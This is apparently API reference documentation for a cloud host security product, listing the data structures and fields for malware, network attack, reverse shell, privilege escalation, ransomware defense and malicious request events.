Used by actions: DescribeMaliciousRequestWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Allowlist ID |
Domain | String | Domain name |
Mark | String | Remarks |
CreateTime | String | Creation time |
ModifyTime | String | Update time |
Malicious file details
Used by actions: DescribeMalwareInfo.
Name | Type | Description |
---|---|---|
VirusName | String | Virus name |
FileSize | Integer | File size |
MD5 | String | File MD5 |
FilePath | String | File address |
FileCreateTime | String | First running time |
FileModifierTime | String | Last running time |
HarmDescribe | String | Severity description |
SuggestScheme | String | Recommended solution |
ServersName | String | Server name |
HostIp | String | Server IP |
ProcessName | String | Process name |
ProcessID | String | Process ID |
Tags | Array of String | Tag Features |
Breadth | String | Impact breadth // Not provided currently Note: This field may return null, indicating that no valid values can be obtained. |
Heat | String | Search popularity // Not provided currently Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Unique ID |
FileName | String | File name |
CreateTime | String | First detection time |
LatestScanTime | String | Last scan time |
Reference | String | Reference link |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
PsTree | String | Process tree in JSON format. pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: executed commands; ssh_service: SSH service IP; ssh_source: log-in source .Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Online status of a host: OFFLINE and ONLINE Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Status. 4: pending; 5: trusted; 6: isolated. Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Risk level. 0: prompt; 1: low; 2: medium; 3: high; 4: critical.Note: This field may return null, indicating that no valid values can be obtained. |
CheckPlatform | String | Trojan detection platforms, separated with commas. 1: cloud security engine; 2: TAV; 3: BinaryAI; 4: abnormal behavior; 5: threat intelligence.Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last modification time Note: This field may return null, indicating that no valid values can be obtained. |
StrFileAccessTime | String | Last access time Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
List of information on malicious file risks
Used by actions: DescribeMalwareRiskWarning.
Name | Type | Description |
---|---|---|
MachineIp | String | Machine IP |
VirusName | String | Virus name |
CreateTime | String | Detection time |
Id | Integer | Unique ID |
File Scan Overview Information
Used by actions: DescribeMalwareRiskOverview.
Name | Type | Description |
---|---|---|
HostCount | Integer | Number of affected hosts |
ProcessCount | Integer | Exceptional Process Count |
FileCount | Integer | Number of Malicious Files |
IsFirstScan | Boolean | Is it the first Scan [false: No | true: Yes]. |
ScanTime | String | Last scan time |
Number of events hitting allowlists
Used by actions: DescribeMalwareWhiteListAffectList.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
HostIp | String | Host IP |
Md5 | String | Affected md5 |
FilePath | String | File path |
CreateTime | String | Add time |
Trojan allowlist information
Used by actions: DescribeMalwareWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
QuuidList | String | CVM QUUID (Separate multiple items with commas.) |
Md5List | String | md5 list (Separate multiple items with commas.) |
IsGlobal | Integer | Whether applies all hosts: 0 - no; 1 - yes |
Mode | Integer | Allowlist mode: 0 - MD5; 1 - customization |
MatchType | Integer | Match mode: 0 - precise match; 1 - fuzzy match |
FileName | String | File name (Separate multiple items with commas.) |
FileDirectory | String | File directory (Separate multiple items with commas.) |
FileExtension | String | File suffix (Separate multiple items with commas.) |
CreateTime | String | Rule creation time |
EventsCount | Integer | Affected records |
Expert service - monthly inspection report
Used by actions: DescribeMonthInspectionReport.
Name | Type | Description |
---|---|---|
ReportName | String | Inspection report name |
ReportPath | String | Inspection report download link |
ModifyTime | String | Inspection report update time |
Network attack event
Used by actions: DescribeAttackEvents.
Name | Type | Description |
---|---|---|
Id | Integer | Log ID |
Uuid | String | Client ID |
DstPort | Integer | Target port |
SrcIP | String | Source IP |
Location | String | Source location |
VulId | Integer | Vulnerability ID |
VulName | String | Vulnerability name |
MergeTime | String | Attack time |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | Attack Status: 0: Attack Attempt 1: Confirmed Attack (Successful Attack). |
Status | Integer | Processing Status: 0 Pending, 1 Processed, 2 Allowlisted, 3 Ignored, 4 Deleted, 5: Defense Enabled. |
VulSupportDefense | Integer | Whether vulnerabilities support defense. 0: No 1: Yes |
VulDefenceStatus | Integer | Whether to enable vulnerability defense: 0 - No, 1 - Yes |
PayVersion | Integer | Machine payment edition. 0: Basic Edition; 1: Professional Edition; 2: Premium Edition; 3: General Discount Edition |
Quuid | String | cvm uuid |
Count | Integer | Attacks |
New | Boolean | Whether to add new hosts today |
Details of Network Attack Events
Used by actions: DescribeAttackEventInfo.
Name | Type | Description |
---|---|---|
Status | Integer | Processing Status: 0 Pending, 1 Processed, 2 Allowlisted, 3 Ignored, 4 Deleted, 5: Defense Enabled. |
SrcIP | String | Attack source IP address |
Location | String | Attack Source |
VulName | String | Vulnerability name |
VulId | Integer | Vulnerability ID |
CVEId | String | Vulnerability CVE ID |
AttackLevel | Integer | Vulnerability attack level |
VulDefenceStatus | Integer | Vulnerability Defense Status: 0 Disabled, 1 Enabled. |
VulSupportDefense | Integer | Whether vulnerabilities support defense. 0: No 1: Yes |
SvcPs | String | Service Process Base64 |
NetPayload | String | Attack packet |
AbnormalAction | String | Abnormal behavior |
Uuid | String | Host UUID |
Id | Integer | Event ID |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
DstPort | Integer | Target port |
Count | Integer | Attack count |
PayVersion | Integer | Machine payment edition. 0: Basic Edition; 1: Professional Edition; 2: Premium Edition; 3: General Discount Edition |
Quuid | String | cvm uuid Note: This field may return null, indicating that no valid values can be obtained. |
MergeTime | String | Time of Attack Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | 0: Attack Attempt 1: Successful Attack Note: This field may return null, indicating that no valid values can be obtained. |
HostOpType | Integer | 0: No Compromised Behavior 1: RCE (command execution) 2: Dnslog 3: Writefile Note: This field may return null, indicating that no valid values can be obtained. |
HostOpProcessTree | String | Process Tree, needs to be decoded with base64. Note: This field may return null, indicating that no valid values can be obtained. |
Statistics on top network attacks
Used by actions: DescribeAttackTop.
Name | Type | Description |
---|---|---|
Agent | Array of TopInfo | Top Statistical Data on Network Attack Host Dimension Note: This field may return null, indicating that no valid values can be obtained. |
SrcIp | Array of TopInfo | Top Statistical Data on Network Attack IP Source Dimension Note: This field may return null, indicating that no valid values can be obtained. |
DstPort | Array of TopInfo | Top Statistical Data on Network Attack Target Port Dimension Note: This field may return null, indicating that no valid values can be obtained. |
Vul | Array of TopInfo | Top Statistical Data on Network Attack Vulnerability Dimension Note: This field may return null, indicating that no valid values can be obtained. |
Attack trend statistics
Used by actions: DescribeAttackTrends.
Name | Type | Description |
---|---|---|
DateTime | String | Time Point, e.g., 2023-05-06 Note: This field may return null, indicating that no valid values can be obtained. |
AttackCount | Integer | Number of attacks Note: This field may return null, indicating that no valid values can be obtained. |
TryAttackCount | Integer | Attack Attempts Note: This field may return null, indicating that no valid values can be obtained. |
SuccAttackCount | Integer | Attack Success Count Note: This field may return null, indicating that no valid values can be obtained. |
Network attack allowlist rules
Used by actions: DescribeNetAttackWhiteList.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID Note: This field may return null, indicating that no valid values can be obtained. |
Description | String | Rule description Note: This field may return null, indicating that no valid values can be obtained. |
Scope | Integer | 0: A group of Quuid 1: All hosts Note: This field may return null, indicating that no valid values can be obtained. |
DealOldEvents | Integer | Whether to process previous events: 0: do not process; 1: process Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | String | Host QUUIDs, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
SrcIP | String | Source IP. Single IP: 1.1.1.1, IP Range: 1.1.1.1-1.1.2.1, IP Range: 1.1.1.0/24, separated by semicolons (;) Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Modification time Note: This field may return null, indicating that no valid values can be obtained. |
Port statistics list
Used by actions: DescribeOpenPortStatistics.
Name | Type | Description |
---|---|---|
Port | Integer | Port number |
MachineNum | Integer | Number of Hosts |
Order Modification Parameter Object
Used by actions: CreateLicenseOrder.
Name | Type | Required | Description |
---|---|---|---|
ResourceId | String | No | Resource ID |
NewSubProductCode | String | No | New Product Identification. PRO_VERSION: Professional Edition; FLAGSHIP: Premium Edition |
InquireNum | Integer | No | Scale-up/Scale-down Count, which is ignored for reconfiguration sub-product |
Order resources
Used by actions: CreateWhiteListOrder.
Name | Type | Description |
---|---|---|
Id | Integer | Resource primary key ID |
ResourceId | String | Resource ID |
BeginTime | String | Start time |
EndTime | String | Expiration time |
LicenseType | Integer | Authorization type |
Operating System Name
Used by actions: DescribeMachineOsList.
Name | Type | Description |
---|---|---|
Name | String | System name |
MachineOSType | Integer | Operating system type enumeration value |
Log-in location information
Used by actions: AddLoginWhiteLists, DescribeLoginWhiteCombinedList, DescribeLoginWhiteList, ModifyLoginWhiteInfo, ModifyLoginWhiteRecord.
Name | Type | Required | Description |
---|---|---|---|
CityId | Integer | Yes | City ID |
ProvinceId | Integer | Yes | Province ID |
CountryId | Integer | Yes | Country ID. Currently, only 1 is supported, indicating China. |
Location | String | No | Location name |
Local privilege escalation data
Used by actions: DescribePrivilegeEventInfo.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | Yunjing ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
ProcessName | String | Process name |
FullPath | String | Process path |
CmdLine | String | Execute commands |
UserName | String | Username |
UserGroup | String | User group |
ProcFilePrivilege | String | Process file permission |
ParentProcName | String | Parent process name |
ParentProcUser | String | Parent process username |
ParentProcGroup | String | Parent process user group |
ParentProcPath | String | Parent process path |
PsTree | String | Process tree json pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: execute commands; ssh_service: SSH service IP; ssh_source: log-in source |
Status | Integer | Processing status: 0: pending; 2: allowlisted; 3: processed; 4: ignored |
CreateTime | String | Occurrence time |
MachineName | String | Machine name |
SuggestScheme | String | Recommended solution |
HarmDescribe | String | Hazard description information |
Tags | Array of String | Tag |
References | Array of String | Reference link |
MachineWanIp | String | Host public IP address |
NewCaps | String | Permission list (Separate multiple items with |.) |
MachineStatus | String | Host online status: OFFLINE; ONLINE |
ModifyTime | String | Processing time |
Local privilege escalation rule
Used by actions: DescribePrivilegeRules.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID |
Uuid | String | Client ID |
ProcessName | String | Process name |
SMode | Integer | Whether the mode is S mode |
Operator | String | Operator |
IsGlobal | Integer | Whether the rule is global |
Status | Integer | Status. 0: valid; 1: invalid. |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Hostip | String | Host IP |
Process statistics data
Used by actions: DescribeProcessStatistics.
Name | Type | Description |
---|---|---|
ProcessName | String | Process name |
MachineNum | Integer | Number of hosts |
Product trial status query API Data output parameter
Used by actions: DescribeProductStatus.
Name | Type | Description |
---|---|---|
FWUserStatus | Integer | Protection status. 1: unprotected; 2: protecting; 3: in trial; 4 expired |
CanApplyTrial | Boolean | Whether application for trial is available. True indicates yes. |
CanNotApplyReason | String | Reason for unavailable trial (Leave it blank if the trial is available.) |
LastTrialTime | String | Last trial end time (Leave it blank if no trial record exists.) |
List of host snapshot backup
Used by actions: DescribeRansomDefenseBackupList.
Name | Type | Description |
---|---|---|
BackupTime | String | Backup time |
EventStatus | Integer | Ransom Status: 0 - No Alarm, 1 - Alarm Present |
BackupStatus | Integer | Backup Status: 0 - Backing up, 1 - Normal, 2, 3 - Failed, 4 - Snapshot expired, 9 - Snapshot deleted |
DiskCount | Integer | Number of backup disk |
Disks | String | Hard Disk Information, separated by semicolons (;). |
SnapshotIds | String | Snapshot List, separated by semicolons (;) |
StrategyId | Integer | Policy ID |
StrategyStatus | Integer | Policy Status: 0 Disabled, 1 Enabled, 9 Deleted |
StrategyName | String | Policy name |
Prevention of Ransomware, Bait and Tamper Events
Used by actions: DescribeRansomDefenseEventsList.
Name | Type | Description |
---|---|---|
Id | Integer | Event ID |
Uuid | String | Host UUID |
Quuid | String | cvm uuid |
HostName | String | Host name |
Status | Integer | Event Status: 0-Pending, 1-Processed, 2-Trusted, 3-In Process, 4-Backup Resumed |
BaitFilePath | String | Tampered File Path |
FilePath | String | Malicious File Path |
Pid | Integer | Malicious Process ID |
PidParam | String | Malicious Process Parameters |
FileSize | Integer | Malicious File Size |
FileMd5 | String | Malicious File MD5 |
Type | Integer | Event Type: 0 Encrypted Ransom, 1 File Tampering |
CreateTime | String | Event Sending Time |
InstanceId | String | CVM Instance ID |
ModifyTime | String | Event Modification Event |
StrategyId | Integer | Policy ID |
StrategyName | String | Policy name |
HostIp | String | Host public IP address |
WanIp | String | Host Intranet IP |
PsTree | String | Process Tree Base64 Json |
ProcessStartTime | String | Process startup time |
SnapshotNum | Integer | Number of Snapshot Backups Owned by the Host |
Anti-ransomware rollback task
Used by actions: DescribeRansomDefenseRollBackTaskList.
Name | Type | Description |
---|---|---|
Id | Integer | Task ID |
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineName | String | Host name |
Status | Integer | Rollback Task Status: 0 - In Progress, 1 - Succeeded, 2 - Failed |
Disks | String | Hard drive ID list, separated by semicolons (;) |
CreateTime | String | Operation time |
BackupTime | String | Snapshot time |
ModifyTime | String | Status!=0 indicates the completion time. |
RegionInfo | RegionInfo | Availability zone information |
The TagList node in the data HostList corresponding to the host list query API
Used by actions: DescribeRansomDefenseStrategyList.
Name | Type | Description |
---|---|---|
Id | Integer | Policy ID |
Uin | String | Operating UIN Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Policy name |
Description | String | Policy Remarks Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Enabling Status: 0 Disabled, 1 Enabled. |
IsAll | Integer | Whether it takes effect for all hosts. |
IncludeDir | String | Includes directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
ExcludeDir | String | Includes directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
BackupType | Integer | Backup pattern: 0 weekly, 1 daily. Note: This field may return null, indicating that no valid values can be obtained. |
Weekday | String | Backup days in a week (1-7): 1; 2; 3; 4. Note: This field may return null, indicating that no valid values can be obtained. |
Hour | String | Backup Execution Time Point (0-23): 11:00; 12:00 |
SaveDay | Integer | Storage Days, 0 for Permanent |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last modification time Note: This field may return null, indicating that no valid values can be obtained. |
MachineCount | Integer | Number of Bound Machines Note: This field may return null, indicating that no valid values can be obtained. |
The TagList node in the data HostList corresponding to the host list query API
Used by actions: DescribeRansomDefenseStrategyDetail.
Name | Type | Description |
---|---|---|
Id | Integer | Policy ID |
Uin | String | Operating UIN Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Policy name |
Description | String | Policy Remarks Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Enabling Status: 0 Disabled, 1 Enabled. |
IsAll | Integer | Whether it takes effect for all hosts. |
IncludeDir | String | Includes directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
ExcludeDir | String | Includes directories, separated by semicolons (;). Note: This field may return null, indicating that no valid values can be obtained. |
BackupType | Integer | Backup pattern: 0 weekly, 1 daily. Note: This field may return null, indicating that no valid values can be obtained. |
Weekday | String | Backup days in a week (1-7): 1; 2; 3; 4. Note: This field may return null, indicating that no valid values can be obtained. |
Hour | String | Backup Execution Time Point (0-23): 11:00; 12:00 |
SaveDay | Integer | Storage Days, 0 for Permanent |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last modification time Note: This field may return null, indicating that no valid values can be obtained. |
MachineCount | Integer | Number of Bound Machines Note: This field may return null, indicating that no valid values can be obtained. |
EventCount | Integer | Policy Associated Event Count Note: This field may return null, indicating that no valid values can be obtained. |
Details of Host Backup Bound to Anti-Ransomware Policy
Used by actions: DescribeRansomDefenseMachineList.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineName | String | Host name |
InstanceId | String | Host Instance ID |
MachineIp | String | Private IP address |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tag | Cloud tag Note: This field may return null, indicating that no valid values can be obtained. |
RegionInfo | RegionInfo | Availability zone information Note: This field may return null, indicating that no valid values can be obtained. |
Tag | Array of MachineTag | CWPP tag Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Protection status: 0 Disabled, 1 Enabled. Note: This field may return null, indicating that no valid values can be obtained. |
StrategyId | Integer | Policy ID. 0 indicates no binding to any policy. Note: This field may return null, indicating that no valid values can be obtained. |
DiskInfo | String | Hard disk information, all hard disks take effect when left blank: Separate diskId1|diskName1;diskId2|diskName2 Note: This field may return null, indicating that no valid values can be obtained. |
StrategyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
BackupCount | Integer | Number of Backups Note: This field may return null, indicating that no valid values can be obtained. |
LastBackupStatus | Integer | Latest Backup Status: 0 - Backing Up, 1 - Normal, 2 - Failed, 9 - No Backup Yet Note: This field may return null, indicating that no valid values can be obtained. |
LastBackupMessage | String | Reason for the Last Backup Failure Note: This field may return null, indicating that no valid values can be obtained. |
LastBackupTime | String | Last Backup Time Note: This field may return null, indicating that no valid values can be obtained. |
RollBackPercent | Integer | Latest Rollback Progress Percentage Note: This field may return null, indicating that no valid values can be obtained. |
RollBackStatus | Integer | Latest Rollback Status: 0 - In Progress, 1 - Succeeded, 2 - Failed Note: This field may return null, indicating that no valid values can be obtained. |
BackupSuccessCount | Integer | Backup Success Count Note: This field may return null, indicating that no valid values can be obtained. |
Anti-Ransomware Host List
Used by actions: DescribeRansomDefenseStrategyMachines.
Name | Type | Description |
---|---|---|
Uuid | String | Host UUID |
Quuid | String | Host QUUID |
MachineName | String | Host name |
InstanceId | String | Host Instance ID |
MachineIp | String | Private IP address |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
CloudTags | Array of Tag | Cloud tag Note: This field may return null, indicating that no valid values can be obtained. |
RegionInfo | RegionInfo | Availability zone information Note: This field may return null, indicating that no valid values can be obtained. |
Tag | Array of MachineTag | CWPP tag Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Protection status: 0 Disabled, 1 Enabled. Note: This field may return null, indicating that no valid values can be obtained. |
StrategyId | Integer | Policy ID. 0 indicates no binding to any policy. Note: This field may return null, indicating that no valid values can be obtained. |
DiskInfo | String | Hard disk information, all hard disks take effect when left blank: Separate diskId1|diskName1;diskId2|diskName2 Note: This field may return null, indicating that no valid values can be obtained. |
HostVersion | Integer | Edition information. 0: Basic Edition; 1: Pro Edition; 2: Ultimate Edition; 3: Inclusive Edition.Note: This field may return null, indicating that no valid values can be obtained. |
StrategyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
Anti-Ransomware Machine Hard Disk Configuration
Used by actions: CreateRansomDefenseStrategy.
Name | Type | Required | Description |
---|---|---|---|
Uuid | String | Yes | Host UUID |
DiskInfo | String | No | Specified Hard Disk List. When it is empty, it means all hard disks: disk_id1|disk_name1;disk_id2|disk_name2. Note: This field may return null, indicating that no valid values can be obtained. |
Client Exception Information Structure
Used by actions: DescribeClientException.
Name | Type | Description |
---|---|---|
HostIP | String | Host IP |
InstanceID | String | Host Instance ID |
OfflineTime | String | Client Offline Time |
UninstallTime | String | Client Uninstallation Time |
UninstallCmd | String | Client Uninstallation Call Chain |
Uuid | String | Client UUID |
Region information
Used by actions: DescribeMachineRegionList, DescribeMachineRegions, DescribeMachines, DescribeMachinesSimple, DescribeRansomDefenseMachineList, DescribeRansomDefenseRollBackTaskList, DescribeRansomDefenseStrategyMachines.
Name | Type | Description |
---|---|---|
Region | String | Region identifiers, such as ap-guangzhou, ap-shanghai, and ap-beijing |
RegionName | String | Chinese name of a region, such as South China (Guangzhou), East China (Shanghai Finance), and North China (Beijing) |
RegionId | Integer | Region ID |
RegionCode | String | Region code, such as gz, sh, and bj |
RegionNameEn | String | English name of the region |
Details of the region list
Used by actions: DescribeMachineRegionList.
Name | Type | Description |
---|---|---|
MachineType | String | Machine type CVM, Tencent Cloud Virtual Machine LH, TencentCloud Lighthouse ECM, Tencent Cloud Edge Computing Machine BM, Tencent BM 1.0 Other, Other servers (non-Tencent Cloud) Note: This field may return null, indicating that no valid values can be obtained. |
CloudFrom | Integer | 0 Tencent Cloud 1 IDC 2 Alibaba Cloud 3 Huawei Cloud 4 Amazon 5 Microsoft 6 Google 7 Oracle 8 Digital Ocean Note: This field may return null, indicating that no valid values can be obtained. |
RegionList | Array of RegionInfo | List of regions Note: This field may return null, indicating that no valid values can be obtained. |
Region information
Used by actions: DescribeBanRegions.
Name | Type | Description |
---|---|---|
RegionName | String | Region name |
ZoneSet | Array of ZoneInfo | AZ information |
Reverse Shell data
Used by actions: DescribeReverseShellEvents.
Name | Type | Description |
---|---|---|
Id | Integer | ID primary key |
Uuid | String | CWPP UUID |
Quuid | String | Server ID |
Hostip | String | Host private IP address |
DstIp | String | Target IP |
DstPort | Integer | Target port |
ProcessName | String | Process name |
FullPath | String | Process path |
CmdLine | String | Command details |
UserName | String | Executing user |
UserGroup | String | Executing user group |
ParentProcName | String | Parent process name |
ParentProcUser | String | Parent process user |
ParentProcGroup | String | Parent process user group |
ParentProcPath | String | Parent process path |
Status | Integer | Processing status: 0 - pending; 2 - allowlisted; 3 - processed; 4 - ignored |
CreateTime | String | Occurrence time |
MachineName | String | Server name |
ProcTree | String | Process tree |
DetectBy | Integer | Detection method: 0: behavior analysis; 1 command feature detection |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Pid | Integer | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
RiskLevel | Integer | Threat level: 0 - medium-risk; 1 - high-risk Note: This field may return null, indicating that no valid values can be obtained. |
Reverse Shell data details
Used by actions: DescribeReverseShellEventInfo.
Name | Type | Description |
---|---|---|
Id | Integer | ID primary key |
Uuid | String | Yunjing UUID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
DstIp | String | Target IP |
DstPort | Integer | Target port |
ProcessName | String | Process name |
FullPath | String | Process path |
CmdLine | String | Command details |
UserName | String | User for execution |
UserGroup | String | User group for execution |
ParentProcName | String | Parent process name |
ParentProcUser | String | Parent process user |
ParentProcGroup | String | Parent process user group |
ParentProcPath | String | Parent process path |
Status | Integer | Processing status: 0: pending; 2: allowlisted; 3: processed; 4: ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
DetectBy | Integer | Detection method |
PsTree | String | Process tree json; pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: execute commands; ssh_service: ssh service IP, ssh_source: log-in source Note: This field may return null, indicating that no valid values can be obtained. |
SuggestScheme | String | Recommended solution |
HarmDescribe | String | Description |
Tags | Array of String | Tag |
References | Array of String | Reference link |
MachineWanIp | String | Host public IP address |
MachineStatus | String | Host online status: OFFLINE; ONLINE |
ModifyTime | String | Processing time |
Reverse Shell rule
Used by actions: DescribeReverseShellRules.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID |
Uuid | String | Client ID |
ProcessName | String | Process name |
DestIp | String | Target IP |
DestPort | String | Target port |
Operator | String | Operator |
IsGlobal | Integer | Whether a global rule |
Status | Integer | Status (0: valid; 1: invalid) |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Hostip | String | Host IP |
Malicious request event
Used by actions: DescribeRiskDnsEventInfo, DescribeRiskDnsEventList.
Name | Type | Description |
---|---|---|
Id | Integer | Event ID |
PolicyId | Integer | Policy ID |
PolicyType | Integer | Type of hit policy [-1: unknown|0: system|1: user] |
PolicyName | String | Name of hit policy |
ProtectLevel | Integer | Protection level [0: basic edition|1: professional edition|2: ultimate edition] |
HostId | String | Server ID |
HostName | String | Host name |
HostIp | String | Host IP |
WanIp | String | Public IP address |
AgentId | String | Client ID |
Domain | String | Access domain name |
Tags | Array of String | Tag Features |
AccessCount | Integer | Access count |
ThreatDesc | String | Threat description |
SuggestSolution | String | Fixing solution |
ReferenceLink | String | Reference link |
HandleStatus | Integer | Processing status [0: pending|2: allowlisted|3: untrusted status|4: processed|5: ignored] |
Pid | Integer | Process ID |
ProcessName | String | Process name |
ProcessMd5 | String | Process MD5 |
CmdLine | String | Command line |
FirstTime | String | First access time |
LastTime | String | Last access Time |
HostStatus | String | Host online status [OFFLINE: offline|ONLINE: online|UNKNOWN: unknown] |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
OsType | Integer | [1:CentOS|2:Debian|3:Gentoo|4:Redhat|5:Ubuntu|6:Windows|7:TencentOS|8:CoreOS|9:FreeBSD|10:SUSE] |
Malicious request list
Used by actions: DescribeRiskDnsInfo, DescribeRiskDnsList.
Name | Type | Description |
---|---|---|
Url | String | External access domain name |
AccessCount | Integer | Access count |
ProcessName | String | Process name |
ProcessMd5 | String | Process MD5 |
GlobalRuleId | Integer | Whether the rule is global. 0: no; 1: yes. |
UserRuleId | Integer | User rule ID |
Status | Integer | Status. 0: pending; 2: added to allowlist; 3: untrusted; 4: processed; 5: ignored. |
CreateTime | String | First access time |
MergeTime | String | Last access Time |
Quuid | String | Unique QUUID |
HostIp | String | Host IP |
Alias | String | Alias |
Description | String | Description |
Id | Integer | Unique ID |
Reference | String | Reference |
CmdLine | String | Command line |
Pid | Integer | Process ID |
Uuid | String | UUID |
SuggestScheme | String | Recommended solution |
Tags | Array of String | Tag Features |
MachineWanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status. OFFLINE: offline; ONLINE: online; UNKNOWN: unknown. Note: This field may return null, indicating that no valid values can be obtained. |
Malicious request policy
Used by actions: DescribeRiskDnsPolicyList, ModifyRiskDnsPolicy.
Name | Type | Required | Description |
---|---|---|---|
PolicyName | String | Yes | Policy name |
PolicyType | Integer | Yes | Policy type [0: system; 1: user] |
PolicyAction | Integer | Yes | Policy action [0: alarm; 1: allow; 2:intercept + alarm] |
HostScope | Integer | Yes | Host range [1: all Professional + Ultimate Editions|2: all Ultimate Editions|0: partial hosts] |
HostIds | Array of String | Yes | Host ID |
Domains | Array of String | Yes | Domain name (when used as an input parameter, it needs base64 encode.) |
IsEnabled | Integer | Yes | Whether effective [0: effective,1: not effective] |
PolicyId | Integer | No | Policy ID |
PolicyDesc | String | No | Policy description |
IsDealOldEvent | Integer | No | Whether to process previous events [0: no|1: yes] |
UpdateTime | String | No | Update time |
EventId | Integer | No | Event ID |
Abnormal Process Event
Used by actions: DescribeRiskProcessEvents.
Name | Type | Description |
---|---|---|
EventId | Integer | Event ID |
HostName | String | Host name |
HostIp | String | Host IP |
WanIp | String | Public IP address |
ProcessId | Integer | Process ID |
FilePath | String | File path |
CmdLine | String | Executed commands |
StartTime | String | Process startup time |
DetectTime | String | Last detection time |
VirusName | String | Virus name |
CheckPlatform | Array of String | Trojan detection platform [1: Cloud search engine |2:TAV | 3: Binary Ai | 4: Abnormal behavior | 5: threat intelligence] |
VirusTags | Array of String | Virus tag |
ThreatDesc | String | Threat description |
SuggestSolution | String | Recommended solution |
ReferenceLink | String | Reference link |
HandleStatus | Integer | Processing Status [0 Pending; 1 Processed; 2 Scanning; 3 Scanned; 4 Exited; 5 Ignore] |
OnlineStatus | Integer | Host Online Status |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID |
Index Rule
Used by actions: DescribeLogIndex.
Name | Type | Description |
---|---|---|
FullText | FullTextInfo | Full-text index configurations |
KeyValue | KeyValueInfo | Key-value index configurations |
Tag | KeyValueInfo | Meta field index configuration |
List of scan task details
Used by actions: DescribeScanTaskDetails.
Name | Type | Description |
---|---|---|
HostIp | String | Server IP |
HostName | String | Server name |
OsName | String | Operating system |
RiskNum | Integer | Number of risks |
ScanBeginTime | String | Scan start time |
ScanEndTime | String | Scan end time |
Uuid | String | UUID |
Quuid | String | QUUID |
Status | String | Status code |
Description | String | Description |
Id | Integer | Unique ID |
FailType | Integer | Failure details |
MachineWanIp | String | Public IP address |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Attack hot spots across the entire network on the large screen
Used by actions: DescribeScreenAttackHotspot.
Name | Type | Description |
---|---|---|
EventName | String | Event name |
SrcIp | String | Attacker IP address |
DstIp | String | Victim IP address |
Region | String | Region |
CreatedTime | String | Time |
Large screen baseline information
Used by actions: DescribeScreenHostInvasion.
Name | Type | Description |
---|---|---|
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
CategoryId | Integer | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
BaselineFailCount | Integer | Baseline check items with risks Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
Visualized security report on the large screen
Used by actions: DescribeScreenBroadcasts.
Name | Type | Description |
---|---|---|
Title | String | Security report article title |
Level | Integer | Severity level of security report article: 0: none; 1: critical; 2: high-risk; 3: medium-risk; 4: low-risk |
Time | String | Release time |
Id | Integer | Article ID |
Network attack logs on the large screen
